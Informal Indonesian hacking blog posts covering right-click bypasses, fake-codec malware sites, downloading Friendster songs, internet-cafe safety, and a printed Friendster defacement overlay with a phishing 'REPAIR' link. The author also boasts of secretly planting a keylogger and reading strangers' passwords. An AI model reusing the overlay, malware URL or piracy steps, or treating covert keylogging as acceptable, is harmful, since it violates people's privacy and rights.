Ada pendapat bahwa proses hacking itu pasti selalu berkaitan dengan software. Baik itu firewall, program, dan lain sebagainya. Kini saya akan tunjukkan sisi lain sebenarnya dari hacking itu sendiri. Hacking adalah seni. Dan seni tidaklah terbatas. Kita akan menggunakan mouse kita sebagai alat hacking untuk mendobrak proteksi tersebut.

Buka kembali halaman anti klik kanan_1. Kini perhatikan langkah-langkah sederhana berikut. 3 jurus maut….

1. Klik tombol kiri (atau tombol tengah jika ada), tahan.
2. Klik tombol kanan, tahan.
3. Lepaskan tombol kiri (atau tombol tengah) setelah itu lepaskan tombol kanan.

Apa yang terjadi? Hehe, you’ve break down the protection…
Kini apa bedanya dengan anti klik kanan_2? Bisakah dilakukan dengan cara seperti nomor 1? Tidak bisa karena pada script nomor 2 kita menggunakan proteksi anti klik kanan setingkat lebih maju dari yang pertama. Coba perhatikan script untuk HTML kedua di atas. Program selain mendeteksi event mousedown juga akan mendeteksi event mouseup. Selain itu program juga akan memonitor aksi tombol kiri dan tombol kanan. Nah, feature semacam ini tidak berlaku untuk contoh pertama di mana program akan kebingungan (baca: puyeng) apabila kita memainkan trik mouse tadi. Kenapa? Pada saat kedua tombol ditekan, akan tercipta sebuah kondisi null. Hal ini akan menyebabkan program tidak mampu mendeteksi tombol apa yang sedang ditekan sehingga proteksi klik kanan gagal dilakukan.

Pada contoh kedua, jangankan menekan tombol kanan, tombol kiri aja juga dimonitor. So, how we do the hack? Masih dengan mouse, kali ini kita punya 5 langkah mematikan.

1. Klik tombol kiri, tahan.
2. Klik tombol kanan, tahan (ooppss…program membaca trik ini)
3. Pada tombol OK, klik kanan tombol tersebut, tahan.
4. Klik kiri tombol OK tersebut, tahan.
5. Lepaskan tombol kiri lepaskan tombol kanan.

Heii,,,program masih terlalu pintar. Aksi ini gak berhasil!!! Jangan jadi orang yang jago ngomong doank dech…basi tau gak!!
Hehe, memang kelihatannya tuh program masih sehat wa’alfiat tapi coba klik OK pesan tersebut. Heheh….selamat menjadi pengcopy-paste setia.

Okay, kita sudah mendapatkan gambaran mengenai menjebol proteksi klik kanan yang diberlakukan oleh webmaster. Lantas, bagaimana dengan situs seperti detiknews dan 17tahun.com? Di situs ini, script tidak langsung berada pada halaman website tersebut melainkan berada pada suatu file tersendiri. Coba save as artikel detiknews ke local disk. Misal jika judul beritanya “Tikus kotor kabur lagi.htm” maka akan tercipta suatu folder dengan nama “Tikus kotor kabur lagi_files”

Dalam folder tersebut, akan ada sebuah folder lagi yang bernama “10_files”. Pada 17tahun.com akan bernama “top_files”

Di dalam folder tersebut (10 maupun top) akan ada sebuah program javascript yang berdiri sendiri (di set berdiri sendiri supaya aksi curang mouse tidak mempan di sini). Saya ambil contoh pada 17tahun.com. Dalam folder top_files nya, ada file dengan nama norightclick. Inilah biang keladinya kenapa aksi maut dari mouse tidak berguna di sini. Berikut adalah kode program tersebut (mungkin berbeda dengan detiknews tapi konsepnya sama saja).

var message=”";
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {
if(document.layers||(document.getElementById&&!document.all)) {
if(e.which==2||e.which==3) { (message); return false; }
}
}

if (document.layers) {
document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS; }
else {document.onmouseup=clickNS; document.oncontextmenu=clickIE; }

document.oncontextmenu=new Function(“return false”);

Tidak hanya klik kanan aja yang diblok. Memblok kalimat untuk di copy pun tidak bisa. Penulis sempat jengkel terhadap situs detik.com karena waktu itu penulis sangat membutuhkan artikel tersebut namun ternyata di proteksi. Haha, ternyata hacking juga dapat membantu kehidupan sehari-hari bukan? So, jangan katakan mempelajari ilmu hacking adalah sesat. Ok, kembali ke topik.

Lalu, bagaimana melalui proteksi tersebut. Javascript adalah program yang running secara client. Artinya? Setiap program yang running dari sisi client dapat dimanipulasi dan itu tidak boleh dipercaya. Tampaknya para webmaster detiknews.com.

1. Pada browser Anda, saya menggunakan IE, buka Tools >> Internet Options. Masuk ke tab Security.
2. Select opsi untuk internet, bukan local intranet, trusted, ataupun restricted.
3. Klik Custom Level.
4. Lantas akan terbuka jendela Security Settings.
5. Cari list yang bernama Scripting. Jika ketemu, scripting tersebut akan memiliki sublist 3 buah. Yang perlu kita perhatikan di sini yaitu yang bernama Active Scripting.
6. Secara default, Microsoft akan menset valuenya dengan Enable. Kini, ubah value tersebut menjadi disable.
7. OK. Jika ada pertanyaan, jawab dengan Yes. Lalu OK lagi.
8. Doorrr…..proteksi klik kanan pun hilang. Eitt,,,tunggu. Ini hanya berlaku untuk detiknews.com. Pada 17tahun.com, untuk mengambil teks nya untuk dicopy, cara ini hanya akan menambah masalah.

Iya, webmaster 17tahun.com ternyata lebih pintar. Ia membuat sebuah enkripsi pada websitenya. Sehingga, yang kita baca sewaktu mengunjungi situs tersebut hanyalah hasil dari deskripsi saja. Sedangkan teks aslinya telah di enkripsi. Save as sebagai .txt? Tidak bisa!! Halaman tersebut telah dienkripsi sedemikian rupa. Untuk itu, saya menggunakan program Adobe Acrobat Reader (terserah Anda mau pakai PDF reader buatan mana). Setelah saya convert halaman 17tahun.com tersebut menjadi format .pdf, kini dengan mudah saya mengcopy-paste teks hasil convert tersebut.

Weleh..weleh…katanya mau menjebol proteksi klik kanan? Heheh, iya tapi khusus untuk situs yang menerapkan enkripsi pada halamannya, dengan cara memainkan tombol mouse maupun mematikan javascript tidak akan ada gunanya. Karena halaman atau teks yang ingin dilindungi itu telah dienkripsi. Di sini kita telah memasuki suatu level lagi yang bernama cypher.

See, ternyata ilmu hacking tidak seburuk yang Anda bayangkan bukan? Dengan ilmu ini saya bisa mendapatkan apapun di internet. Jadikan ilmu yang ada pada diri kita bermanfaat setidaknya untuk kita sendiri. Jika bisa bermanfaat untuk orang lain, sebarkanlah ilmu itu.

Kuasai ilmu hacker sebelum Anda dikerjai oleh hacker. Maju terus ilmu pengetahuan Indonesia.

Hacking, power of knowledge.
Hacking bukan hanya sekedar teori,

-sky73rx3 a.k.a sky73rx7-

PERHATIAN: UNTUK DAPAT MELIHAT GAMBAR SECARA UTUH, KLIK GAMBARNYA. KEMUDIAN WINDOW BARU AKAN TERBUKA DAN ME-LOADING SITUS WEBSHOTS. KLIK ICON ZOOM DI CONTROL PANEL DI BAWAH GAMBAR TERSEBUT.

Menyambut berakhirnya tahun 2007 dan dimulainya era tahun 2008 tentu saja banyak hal yg dilakukan oleh banyak orang (kecuali saya krn saya bukan orang “tradisi new year”) di muka bumi ini untuk merayakan hal tersebut. Ada yang sibuk dengan ngurusin dompet untuk membeli alat-alat baru, sibuk ngecat rumah, sibuk smsan untuk party bareng, dan kesibukan lainnya. Normal dan ini memang normal. Namun, ada suatu hal baru yang benar-benar baru. Malware Codec!! Apa hubungannya dengan tahun baru??

Dewasa ini yang namanya internet sudah pasti hampir dikenal semua orang. Berbagai layanan pun diberikan mulai dari hiburan, pendidikan, politik, komunikasi, hingga ekonomi dan bisnis. So, apa yang paling banyak dicari oleh orang ketika ada event besar yang akan berlangsung? Tentunya hiburan! Ada yang memulainya dengan mengirim testimonial, mengirim e-mail, dan sebagainya. Apa yang dikirim? Tentu saja video atau clipart.

Teknik ini memakai teknik Soseng* (Social Engineering) di mana korban yang mengakses suatu video tertentu di internet akan diminta untuk mendownload file codec. Makhluk seperti apa lagi tuh codec? Codec yaitu file yang dibutuhkan oleh player maupun browser Anda untuk menjalankan file-file bertipe multimedia. Misalnya untuk video AVI Microsoft dibutuhkan codec standar AVI dari Microsoft. Untuk menjalankan video AVI dari Camtasia maka dibutuhkan codec AVI dari TechSmith. Untuk menjalankan video berformat DVD dibutuhkan codec DivX salah satunya. Dan lain sebagainya.

Bagaimana jika codec tersebut tidak tersedia di komputer kita? Simple saja. Browser ataupun player Anda akan menginformasikan bahwa file yang ingin dijalankan membutuhkan codec tertentu dan mempersilahkan Anda untuk mendownloadnya dari internet. Pesan-pesan error nya pun bermacam-macam, di antaranya “Unexpected File Format”, “Windows Media Player cannot play the file. The Player might not support the file type or might not support the codec that was used to compress the file”

Okay, selesai sudah dengan permasalahan definisi codec nya. Kini, bagaimana mengeksploitasi hal tersebut sehingga dapat membuat tahun baru ataupun event-event lainnya menjadi berbahaya di internet? Good question!

Sebelum menulis blog ini, terlebih dahulu saya bertanya ke beberapa teman saya yang ada di luar negeri (USA dan Inggris). Eitt, ini bener-bener orang bule lohh. Sengaja saya tidak bertanya ke orang Indonesia yang tinggal di sana karena kemungkinan besar mereka tidak mengetahui budaya barat dengan benar. Lalu, apa yang saya tanyakan? Simple saja. “What will you do and your friends do for new year celebration or christmas or halloween party or else using internet? N how about devilled egg?” Dan mereka kebanyakan menjawab mencari video yang berhubungan dengan “hari” itu dan men-share-kan video tersebut ke teman-teman mereka

Hal yang paling sering dilakukan oleh user yang belum terbiasa dengan situs-situs video resmi adalah mencari video tersebut melalui search engine. Biasanya Google, Yahoo, Live Search, dll. Beruntung jika situs yang ditemukan adalah situs asli dan memang menyediakan jasa video sharing. Namun, bagaimana dengan gambar yang di bawah ini?

Percayakah Anda bahwa situs tersebut adalah situs jahat? Lalu, di mana kejahatannya? Bagaimana situs tersebut mampu mencuri data-data Anda ketika Anda sedang asik men-sharing video tersebut kepada teman-teman Anda?

Pertama-tama, user yang awam mencari video tersebut di Google atau sejenisnya. Lantas, setelah ketemu link yang diinginkan (diasumsikan palsu), maka user akan dihadapkan dengan gambar situs di atas. Situs ini sendiri aslinya adalah situs blogging (www.blogger.com). Pemilik blog ini mendesain sedemikian rupa tampilan blognya agar terlihat meyakinkan dengan “player” video yang dia masukkan di blog tersebut.

Kedua, korban akan bingung kenapa video nya tidak mulai-mulai. So, di-klik lah tombol play yang ada di “player” tersebut. Dan apa yang terjadi? Ooopsss…
Korban akan diberi pesan error mengenai codec yang belum diinstal di komputer korban. So, akan muncul kotak dialog untuk mendownload (Save) codec tersebut ataupun langsung menjalankannya (Open/Run). Mana yang lebih baik? Terserah Anda! Hahahaaha…. Silahkan lihat gambar berikut ini.

Ini adalah gambar di mana seorang user terkecoh. Ketika ia meng-klik “player” tersebut, lantas ia disuruh mendownload file codec nya yang sebenarnya tidak ada codec yang perlu di instal sama sekali. Yang di download justru malware, file yang bersifat merusak (virus, worm) ataupun sekedar Trojan.

Okay, dari tadi saya menulis kata “player” menggunakan tanda petik. Apa maksudnya? Player di blog palsu tersebut adalah player palsu. Bisa dilihat dari tampilan awalnya yaitu indikator buffer atau sering juga disebut slider nya langsung penuh atau full. Jika koneksi internet Anda memakai T1, artikel saya ini wajib Anda caci maki. Namun, jika Anda menggunakan telkomnet ataupun speedy ataupun fastnet yang speed nya jauh di bawah koneksi T1, maka hal ini (slider penuh) wajib dicurigai.

Okay, bagaimana cara membuktikan bahwa player tersebut palsu? Gampang aja. Buka resource situs tersebut (klik kanan dan pilih View Resource). Kemudian, cari (tekan Ctrl+F) kata-kata mengenai embed. Kenapa harus embed dan bukan jembed?? Hahahaha… Karena semua video yang ada di dalam situs pasti memakai tag <embed src = www.host.com/…/file_video.wmv height=”120″ width=”240″ ……..></embed>

Ketemu gak? Tentu tidak karena TIDAK ADA VIDEO SAMA SEKALI!!! So? Player tersebut adalah GAMBAR!!! Coba klik kanan gambar nya (pada browser) dan klik Image Properties (Opera) atau Properties (IE). Lihat gambar di bawah ini.

Gambar player tersebut ternyata di ambil dari http://somemisc.info/player.jpg . Trik Soseng yang sangat jitu untuk mengelabui korbannya.

Tahun Baru China

Tidak hanya itu saja aksi perusakan yang dilakukan dengan cara seperti ini. Beberapa attacker lainnya menciptakan cara yang lebih ampuh untuk menyerang korbannya. Dan kali ini menimpa hari Tahun Baru China atau Chinese New Year. Skenarionya:
1. Korban mencari video yang berhubungan dengan Tahun Baru China melalui situs search engine.
2. Korban meng-klik situs yang merupakan situs palsu.
3. Ketika situs dibuka, situs tersebut langsung di-redirect ke http://xscanner.malwarealarm.com/a/ InstallXXX.exe di mana XXX = angka acak.
4. Dan malware berjenis Downloader pun langsung bersarang di komputer korban.

Silahkan lihat gambar berikut.

<a target=”_blank” href=”http://entertainment.webshots.com/photo/2265838830057949296xAbACG” mce_href=”http://entertainment.webshots.com/photo/2265838830057949296xAbACG”><img src=”http://inlinethumb15.webshots.com/38926/2265838830057949296S200×200Q85.jpg” mce_src=”http://inlinethumb15.webshots.com/38926/2265838830057949296S200×200Q85.jpg” alt=”Fake Warn Message”></a>

Ada yang menarik di sini. Coba perhatikan gambar yang paling akhir. Perhatikan lingkaran yang berwarna kuning. Ada yang aneh? Perhatikan baik-baik. Saya menggunakan Opera namun di caption “form” nya tertulis Internet Options. Tidak hanya itu, style dari “form” tersebut bukanlah style Opera. Melainkan Internet Explorer. Lagipula, itu bukan form / window kok. Itu cuma gambar yang kalau di klik akan kembali mengirimkan malware ke komputer korban.

Okay, sekian dulu artikel kali ini.
Semoga bermanfaat.

NB: Soseng = Social Engineering (by PIRUS)…hehehe

-sky73rx3 – sky73rx7-

Hey hey you you…….

Ada yang penasaran gak gimana caranya mendownload (baca:menyimpan secara tidak sah) lagu-lagu (backsound) yang ada di Friendster? Gw nemuin cara yang cukup simple untuk menyimpan lagu tersebut. Yang penting lo punya alamat URL lagu tersebut.

Okay, gw ambil contoh lagu Muse dengan judul Stockholm Syndrome yang ada di backsound FS gw. Pertanyaan berikutnya, gimana cara agar lagu tersebut “run” di FS? Tentunya ini sudah banyak yang tau. Customize Profile! Yup, di bagian customize profile terdapat box (media) yang dapat digunakan untuk memasukkan kode-kode HTML supaya lagu yang ada di situs tertentu dapat “run” di FS kita. Nah, kode untuk lagu Muse tersebut adalah:

<embed src=“http://divine-music.net/musicfiles/Muse – Stockholm Syndrome.wma”
autostart=”TRUE” loop=”TRUE” width=”300″ height=”45″ align=”CENTER” allowScriptAccess=”never”></embed>

Arti dari kode di atas yaitu FS akan membuka file musik (embed src) yang ada di situs divine-music.net dengan lokasi direktori musicfiles dan nama file nya adalah Muse – Stockholm Syndrome. Metode nya yaitu file langsung dimainkan (autostart=True) dan menampilkan player dengan lebar 300px dan tinggi 45px (defaultnya adalah 0px semua a.k.a player tidak ditunjukkan).

Masukkan kode tersebut di box kemudian Save. Refresh profile Anda dan sesaat kemudian di mediabox FS akan muncul player yang memainkan file *.wma. Saya menggunakan Windows Media Player untuk memainkan segala file musik wma. Tidak hanya itu, lagu Muse tersebut pun langsung dijalankan di profile Anda. Ya, walaupun kualitasnya tidak sebagus mp3 atau yang ada di CD aslinya.

Back to topic, gimana supaya lagu tersebut bisa didownload (baca:dicuri)? Gampang!!

Phase 1
* Buka notepad.

Phase 2
* Masukkan kode html berikut
<html>
<body>
</body>
</html>

Phase 3
* Sisipkan alamat URL lagu yang diinginkan di tengah² tag body.
<html>
<body>
<a href=“http://divine-music.net/musicfiles/Muse – Stockholm Syndrome.wma”>Nyolong Stockholm Syndrome nya Muse</a>
</body>
</html>

Phase 4
* Save dengan nama file terserah namun sebagai file HTML. Caranya, setelah muncul dialog save, pilih Save as Type nya All Files (*.*) kemudian tulis nama filenya, misalnya Colong Muse.html

Phase 5
* Jalankan file tersebut. Bisa melalui Open di browser ataupun eksekusi langsung. Setelah browser membuka file tersebut, klik link
Nyolong Stockholm Syndrome nya Muse.

NB: Jangan menggunakan Internet Explorer. Gunakan browser lain, misalnya Opera.

-sky73rx3 a.k.a sky73rx7-

Bagi pengguna internet yang memakai jasa Warnet, gw mau bagi² info terkait keamanan serta kenyamanan yang ada.

1.    Setelah browsing, pastikan untuk membersihkan file sampah (temporary files)
Banyak user warnet yang setelah selesai menggunakan komputernya, ia langsung bergegas menuju kasir (baca:operator; nyank punya warnet). Hal ini tidaklah bagus. Karena, user berikut yang menggunakan komputer yang sama, ada kemungkinan bisa mengakses situs-situs yang tadinya dibuka oleh user sebelumnya (misalnya FS). Ada kasus di mana setelah user log-out FS dan membuka kembali browsernya dan masuk ke FS lagi, tiba-tiba ia langsung masuk ke profilenya tanpa harus login terlebih dahulu. Ini fatal coy!!! So, bersihkan dulu file sampah sebelum meninggalkan komputer warnet. Caranya:
a. Buka Browser, jika menggunakan Opera dan Netscape, lompat ke point f
b. Sorot ke Tools >> Internet Options dan buka Tab General (gw pake IE 7, so versi yang di bawahnya harap menyesuaikan).
c. Klik Delete. Akan ada 5 pilihan penghapusan file sampah. Lebih baik pilih yang sadis, yaitu Delete All (temporary files, cookies, forms, dll)
d. Tunggu proses selesai. Kemudian, kembali ke browser dan ketikkan www. Pastikan pada address bar nya tidak ada lagi muncul daftar² situs.
e. Jika masih muncul, ulangi tahap b. Jika tidak muncul apa-apa, berarti file sampah sudah dihapus dan lo udah bisa dengan santai pergi ke kasir warnet.
f. Sorot Tools >> Delete Private Data (Opera) dan Clear Private Data (Netscape). Centang semua metode penghapusan yang ada (termasuk cookies).
g. Setelah itu, tekan Delete.
h. Kembali ke browser, tulis www pada address bar. Pastikan tidak ada satu situs pun yang muncul. Ulangi point f jika masih ada yang muncul.

2.    Jika diperbolehkan, restart komputernya.
Moga-moga operatornya kagak cerewet. Kalo kompie boleh di-restart, restart aja. Tidak ada penjelasan detail untuk hal ini tapi akan lebih baik jika kompie boleh di-restart. Sukur² klo kompienya akan menghapus semua file sampah pada direktori lokal komputer (berdasarkan pengalaman, ya)

3.    Pastikan komputernya terinstal Deep-Freeze
Deep-Freeze merupakan musuh sejati para keparat² warnet (termasuk saya). Apa itu Deep-Freeze? Deep-Freeze merupakan program yang akan membekukan (freeze) sistem komputer ketika program tersebut diinstal pertama kali. So, jika ada virus yang menginfeksi komputer, don’t worry, tinggal restart aja komputer dan tuh virus akan lenyap seketika. Program ini akan mengembalikan settingan komputer seperti sedia kala (saat program diinstal pertama kali) ketika komputer restart.
Tadi disinggung bahwa Deep-Freeze merupakan musuh besar para bajingan warnet. Kenapa? Beruntunglah bagi warnetnya yang menginstal Deep-Freeze. Soalnya, bagi bajingan warnet yang ingin meraup keuntungan tersendiri, hal itu akan mustahil dilakukan. Hal itu? Keylogger!!!
Keylogger merupakan program untuk merekam ketukan keyboard dan juga bisa merekam tampilan layar monitor per waktu tertentu. Jika lo lagi buka friendster dan ternyata ada keylogger tertanam di warnet, maka say goodbye buat FS lo. Keylogger akan mencatat email, password, dan seluruh hasil ketikan lo di keyboard. Tau kan bahaya keylogger?
Hal ini pernah gw coba di salah satu warnet. Gw tanamkan keylogger buatan gw dan gw tinggal tuh komputer. Besoknya gw datang lagi dan duduk di kursi yang sama. Gw buka direktori hasil rekaman keyloggernya dan BINGO!! Begitu banyak alamat email, password, surat cinta, caci maki kepada rekan kerja dan lainnya yang bisa gw baca! Ini sungguh gila!! Beruntung deh waktu itu gak ada yang login ke situs² e-banking. Jika ada, lo pasti tau akibat selanjutnya. Alhasil, gw suruh tuh operatornya (waktu itu namanya mbak Winda) supaya pasang Deep Freeze. Kenapa? Soalnya ketika komputer di-restart, Deep-Freeze akan membuang settingan keylogger yang udah meracuni sistem. Sehingga, keylogger tidak akan bisa lagi bekerja setelah kompie di restart! Tidak hanya itu, seluruh file hasil rekaman keylogger juga akan hilang ketika kompie di-restart (so, penting banget kan nge restart komputer warnet…apalagi klo ada Deep-Freeze nya). Yahh, walaupun akhirnya tercipta juga program Deep Unfreezer. Yaitu program untuk mematikan proses Deep Freeze.

Gimana cara tau ada Deep-Freeze terpasang di komputer?
Pertanyaan bagus! Cukup buka TaskManager (Ctrl+Alt+Delete). Buka tab Process. Cari process yang bernama FrzState.exe. Jika ketemu, berarti Deep-Freeze sudah menjalankan fungsi-fungsinya. Jika tidak ada, U SHOULD BE AWARE dengan yang namanya tuh warnet. Bagi yang user awam, gw gak tau harus ngomong gimana tapi please cari info tentang keamanan ketika berinternet. Bagi yang sudah memiliki skill lebih di bidang komputer, cari process² yang mencurigakan. Bisa jadi itu keylogger atau program jahat lainnya (virus, trojan, worm).

4.    Pastikan TaskManager bisa diakses.
Kenapa? Ada beberapa warnet yang Task Managernya dikunci (tidak bisa diakses). Dari segi keamanan, ini memang perlu. Tapi, ada sisi negatifnya juga. Di mana? Siapa tau justru si OPERATOR warnet lah yang menanamkan keyloggernya ke masing-masing komputer client. Dan dengan sengaja ia mengunci TaskManager agar user yang udah les komputer tidak dapat melihat process² yang aneh. (Ini sungguh kurang ajar!!!)
So, apa yang harus diperbuat? Banyak cara kok. Salah satunya dengan memanfaatkan command prompt.
1. Start >> Run. Atau Winkey+R pada keyboard. Tulis cmd dan enter
2. Ketik tasklist dan enter
3. Tunggu sejenak dan lihat hasilnya. Lihat pada bagian image name. Jika deep-freeze tidak terinstal, lo kudu waspada dengan warnetnya.

5.    Pastikan command prompt bisa diakses.
Aneh juga rasanya jika TaskManager dan command prompt tidak bisa diakses. Jika memang kasusnya seperti itu, hubungi gw gimana caranya untuk melihat process² sistem dan program-program² yang sedang berjalan di komputer.

Okay, sekian dulu tips aman di warnet dari gw. Jika ada pertanyaan, silahkan tanya aja. Gausah malu-malu…hahaha. Asalkan pertanyaannya bukan yang berbau kriminal, misalnya meminta keylogger, menghukum si operator warnet dengan virus, dan pertanyaan sejenis lainnya.

-sky73rx3 a.k.a sky73rx7-

Okay, jika Anda mengunjungi blog ini dari FS saya, maka seluk beluk permasalahannya pasti sudah Anda ketahui. Namun, bagi yang belum, akan saya ulas kembali.

Dewasa ini marak kasus meng-hack FS dengan cara men-deface halaman testimonial dan sekaligus halaman profilenya. Hanya segelintir orang yang mengetahui bagaimana cara mengatasinya. Namun, dengan jumlah yang tak seimbang antara yang mengetahui dan yang tidak mengetahui, maka tulisan ini saya rasa wajib untuk dibuat.

Kasusnya yaitu ada seseorang, baik teman maupun bukan teman dari friendlist kita, yang mencoba mengirimkan testimonial yang aneh. Apa anehnya? Ketika korban mendapatkan ada pesan “New Comments” dan membuka halaman testimonialnya, maka korban tidak bisa untuk melakukan apa². Karena testi yang baru tersebut telah dimanipulasi sehingga korban tidak bisa membuka halaman testimonialnya.
NB: Semua link gambar yang saya sertakan berasal dari situs webshots. Jika kamu gak punya software Webshots Desktop, jangan men-download gambarnya jika ingin melihat tampilan secara penuh. Gunakan tombol zoom pada panel yg disediakan.

Gambar 1 – Opera
Gambar 2 – IE

Jadi, bagaimana cara saya ataupun Anda untuk memberitahu si korban bahwa Fsnya sudah di deface (merubah tampilan asli dari suatu situs)? Cara yang saya lakukan adalah langsung menuliskan alamat kirim testi atau message ke URL Address bar pada browser. Contohnya yaitu:

http://www.friendster.com/comments.php?uid=39044492

Untuk mengirimkan pesan testimonial pada FS, kita harus masuk ke script phpnya, yang tak lain adalah comments.php. Script ini adalah script global. Artinya, kita perlu mengeset siapa yang akan kita kirimkan testi. Dan kita juga harus mengikuti peraturan FS, yaitu dengan nomor User ID nya (uid). Pada URL di atas, saya kirimkan testi ke orang yang User ID nya 39044492. (Terima kasih kpd Etha yang telah mengizinkan URLnya untuk edukasi).

Lantas, bagaimana dengan message? Pertanyaan bagus! Jika halaman testi korban telah di deface, maka ia tidak bisa melihat isi testi pemberitahuan yang kamu tulis. So, send the message!

http://www.friendster.com/sendmessage.php?uid=39044492

Sama seperti penjelasan bagaimana masuk ke halaman isi testi, namun di sini kita mengakses script sendmessage.php dengan User ID 39044492.

Untuk mengetahui nomor User ID korban cukup mudah. Jika ia tidak merubah alamat URL FS nya, maka cukup masuk ke profilenya dan lihat URL nya. Nanti akan ada sederetan angka seperti 39044492. Misalnya, profiles.friendster.com/39044492. Atau, cara kedua, jika korban telah merubah halaman default Fsnya, maka untuk mengetahui User ID nya, kita harus masuk ke source codenya. Klik kanan pada browser dan pilih Source / View Source. Temukan script seperti ini:

var pageViewerID = “10654779″;
var pageOwnerID = “10654779″;
var pageViewerFName = “Rein”;
var pageOwnerFName = “Rein”;

Terlihat dengan jelas nomor dari User ID beserta nama depannya (yang berwarna biru). Sedangkan yang berwarna hitam adalah ID orang yang melihat profile si 10654779.

Bagaimana script deface tersebut bekerja
Script ini hanya menggunakan fungsi dimensional (Width, Height, Top, dan Left). Layer gambar yang semestinya kecil, bisa dimanipulasi menjadi besar dengan menggunakan fungsi dimensional tersebut. Mari kita lihat script defacenya di bawah ini. Gambar dapat dilihat di Script Asli

<DIV class=”fitem1wrapper evenrow”>
<TABLE class=fitem1table>
<TBODY>
<TR>
<TD class=itd>
<DIV class=imgblock75><a href=”http://profiles.friendster.com/25991529″ mce_href=”http://profiles.friendster.com/25991529″><img src=”Friendster%20-%20desy%20cie_files/1_264773351m.jpg” mce_src=”Friendster%20-%20desy%20cie_files/1_264773351m.jpg”></a></DIV></TD> <TD class=dtd> <UL class=data>
<LI class=title><a href=”http://profiles.friendster.com/25991529″ mce_href=”http://profiles.friendster.com/25991529″>nadiiie</a>

<LI>Posted 14/11/2007 07:04
<LI>
<DIV align=left>
<DIV id=Layer1
style=”BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; LEFT: 1px; BORDER-LEFT: #000000 1px; WIDTH: 1280px; BORDER-BOTTOM: #000000 1px; POSITION: absolute; TOP: 0px;
HEIGHT: 5000px;
BACKGROUND-COLOR: #ffffff; 1: ; layer-background-color: #ffffff”><BR><BR>
<CENTER><FONT face=Verdana color=#000000 size=5><STRONG><BR><BR><BR><BR>Aduh kayaknya ada kesalahan teknis nih..<BR><BR><BR>Sabar yah..<BR><BR><BR><img height=240 src=”http://mural.uv.es/osherpin/Under%20Construction.gif” mce_src=”http://mural.uv.es/osherpin/Under%20Construction.gif” width=240 border=0></STRONG></FONT></CENTER><BR><BR><FONT face=”Copperplate Gothic Bold” color=#000000 size=5> <CENTER><STRONG>Klik link dibawah ini
untuk memperbaikinya:<BR><BR><BR><a href=”http://members.lycos.co.uk/tahapahaptah/” mce_href=”http://members.lycos.co.uk/tahapahaptah/”>REPAIR</a></STRONG></CENTER></FONT><BR><BR> <CENTER><FONT face=HELTERSKELTER color=#ff0000 size=5><BR>Maaf atas ketidaknyamanan anda</MARQUEE> <BR></CENTER></DIV></DIV></LI></UL></FONT></TD></TR></TBODY></TABLE></DIV>

Perhatikan tulisan yang saya blok dengan warna hijau. Ada 2 baris open-tag Div. Pada baris kedua, ada pendefinisian Layer baru dengan nama Layer1. Layer1 inilah yang akan menampung gambar Under Construction nanti. Dengan cara pembuatan layer baru inilah team FS masih terkecoh dengan proteksi yang mereka miliki.

Perhatikan juga tulisan yang saya mark dengan warna merah tebal. Itulah script dimension untuk Layer dalam suatu website. Sekarang lihat nilainya masing² (dalam satuan pixel).
Left: 1px
Top: 0px
Width: 1280 px
Height: 5000 px

Nilai 1 pada Left akan mengakibatkan posisi Layer1 berada di sebelah kiri. Nilai 0 pada Top mengakibatkan posisi Layer1 tepat berada di atas page. Sedangkan nilai 1280 pada Width menyebabkan lebar Layer1 menjadi 1280 pixel. Begitu juga dengan Height dengan nilai 5000 pixelnya yg akan menyebabkan tinggi dari Layer1 yaitu 5000 pixel. Nilai 1280 dan 5000 pixel ini benar² tidak masuk akal. Inilah biang keladi kenapa korban tidak bisa melihat halaman testimonialnya. Jelas saja, halamannya ditutupi oleh Layer dengan ukuran 1280×5000…. Bahkan dimensi resolusi monitor saja belum ada yg seukuran itu.

Setelah layer1 tersebut menutupi halaman testimonial, maka ia akan me-loading gambar dari situs lain. Gambar tersebut adalah Under Construction.gif yg diambil dari situs (lihat yg berwarna biru). Gambar di set dengan ukuran 240×240 pixel. Lokasi gambar diambil pada situs mural.uv.es dengan direktori osherpin dan nama filenya adalah Under Construction.gif. Tanda %20 merupakan heksa dari spasi. Hal seperti ini tidak perlu dipusingkan karena browser akan otomatis merubah spasi menjadi karakter heksa pada URL nya.

Kemudian, script ini akan membuat link ke Lycos (lihat yg berwarna hijau). Link tersebut diletakkan di tombol REPAIR. Jadi, jika korban mengklik REPAIR tersebut, maka akan dibuka halaman dari Lycos.
Gambar 3

Ada hal yang bodoh di sini. Terdapat close-tag MARQUEE tanpa ada open-tag nya. Mungkin si script kiddies ini memang bener-bener tukang contek….

Mencari tau si pengirim testi alias Script Kiddies
Lihat pada script di atas yang saya mark dengan warna merah gelap dan bergaris bawah. Pengirimnya adalah orang dengan User ID 25991529. Namanya? Tebak aja ndiri….hehehhee.
Gambar 4.

Menghapus testi si Script Kiddies
1.    Bagi pengguna Opera, cukup ikuti langkah simple berikut:
*) Login terlebih dahulu
*) Masuk secara langsung ke halaman testimonial (jika sudah terlanjur approved)
*) Cara 1: http://www.friendster.com/comments.php >> jika sudah approved
*) Cara 2: http://www.friendster.com/comments.php?action=pending >> jika masih pending
*) Lihat source code nya >> klik kanan dan pilih Source.
*) Tekan Ctrl+F (Find) dan tulis salah satu keyword berikut ini:
**) Aduh
**) kayaknya
**) kesalahan teknis
**) REPAIR
**) ketidaknyamanan anda
**) construction (atau const saja)
*) Ubah nilai dimensionnya menjadi:
**) Left: 350 px >> menggeser 350 pixel ke kanan
**) Top: 350 px >> menggeser 350 pixel ke bawah
**) Width: 80 px >> memperkecil ukuran lebar frame menjadi 80 pixel
**) Height: 10 px >> memperkecil ukuran tinggi frame menjadi 10 pixel
*) Tekan tombol Apply Changes pada Opera.
*) Buka jendela testimonialnya dan sim salabim… Kini korban bisa menghapus testi sialan tersebut dan memblokir pengirimnya bila perlu.
*) Contoh gambar: Gambar 5

2.    Bagi pengguna Internet Explorer
*) Login terlebih dahulu
*) Masuk secara langsung ke halaman testimonial (jika sudah terlanjur approved)
*) Cara 1: http://www.friendster.com/comments.php >> jika sudah approved
*) Cara 2: http://www.friendster.com/comments.php?action=pending >> jika masih pending
*) SAVE terlebih dahulu halamannya dengan cara Page >> Save As pada IE 7 atau File >> Save As pada IE 5 atau 6
*) Pilih Save as Type nya menjadi Webpage, complete (*.htm; *.html) dan tentukan lokasi penyimpanannya.
*) Tutup browsernya dan buka kembali file HTML yang telah disimpan tadi.
